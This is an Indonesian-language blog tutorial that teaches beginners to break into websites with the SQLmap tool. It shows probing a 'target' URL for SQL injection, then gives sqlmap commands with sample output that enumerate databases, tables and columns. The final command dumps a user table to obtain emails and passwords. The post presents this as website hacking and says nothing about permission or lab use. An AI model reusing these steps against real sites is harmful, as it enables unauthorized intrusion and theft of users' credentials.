Tutorial Menggunakan SQLmap Untuk Pemula - Mastah Cyber

Mastah Cyber

Tutorial, Teknologi, Android, Dan Sebagainya

Breaking

Home Top Ad

Post Top Ad

Friday, February 8, 2019

Tutorial Menggunakan SQLmap Untuk Pemula

Apa Itu SQlmap?

SQLmap ialah tool atau alat otomatis mengeksploitasi SQL yang sangat populer, dengan menggunakan tool atau alat ini kalian dapat mendapatkan database dari sebuah website dengan mudah dan cepat. Alat ini bisa dikatakan alat untuk hack atau meretas website yang ampuh.

SQLmap

Tutorial Mengunakan SQLmap Untuk Pemula

Misalkan kalian sudah mempunyai target situs untuk di injeksi oleh SQLmap, anggap saja url situs tersebut seperti berikut.
site.com/news.php?id=1
Untuk, mengecek apakah situs tersebut vuln atau memiliki celah SQL-I, kalian tinggal menambah kan tanda ' dibelakang url seperti berikut.

site.com/news.php?id=1'
Untuk memastikan situs tersebut vuln, jika kalian menambahkan ' dibelakang url dan munculnya error ataupun blank berarti situs tersebut vuln atau bisa di injeksi oleh SQLmap dan sebaliknya jika tidak, berarti tidak vuln atau memiliki celah SQL.

Nah jika kalian sudah memiliki target situs yang vuln kalian tinggal menyalin url situs tersebut terlebih dahulu. Lalu silahkan buka cmd, terminal atau termux kalian, lalu masuklah kedalam direktori tool SQLmap, dan jalankan perintah berikut untuk menginjeksi situs tersebut.

python2 sqlmap.py "site.com/news.php?id=1" --dbs
Otomatis SQLmap akan menginjeksi situs tersebut, dan akan mengambil database situs tersebut, nah misalkan kalian sudah mendapatkan nama atau info database seperti berikut.
available databases [2]: 
[*] information_schema 
[*] mastahcyber
Selanjutnya jika kalian ingin mengetahui tabel mastahcyber dari database tersebut kalian tinggal, menggunakan perintah berikut.

python2 sqlmap.py "site.com/news.php?id=1" --tables -D mastahcyber
Setelah kalian mendapatkan tabel dari database tersebut, misalnya kalian mendapatkan tabel sebagai berikut.
[*] user
[*] admin
Nah jika kalian ingin mengetahui isi tabel, kalian tinggal menggunakan perintah.

python2 sqlmap.py "site.com/news.php?id=1" --columns -D namadatabase -T namatabel
Contoh kita akan melihat isi tabel user dari database mastahcyber, kita tinggal menggunakan perintah.

python2 sqlmap.py "site.com/news.php?id=1" --columns -D mastahcyber -T user
Setelah kalian mendapatkan isi dari tabel, misalnya isi tabel tersebut seperti berikut.
Table: user [8 columns] 
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash     | varchar(128) |
| id              |    int(11)    |
| name       |    text         |
| password          | text         |
| id                | tinyint(5)   |
| access            | text         |
| system_user       | text       |
+-------------------+--------------+
Nah jika kalian ingin mengetahui email dan password dari dari database mastahcyber dan tabel user, kalian tinggal menggunakan perintah.

python2 sqlmap.py "site.com/news.php?id=1" --dump -D mastahcyber -T user
Dan kalian pun akan mendapatkan informasi email dan password dari database tersebut.

Nah itulah tutorial menggunakan SQLmap untuk pemula, sekian sampai jumpa di artikel menarik lainnya.

No comments:

Post a Comment

Post Bottom Ad

Responsive Ads Here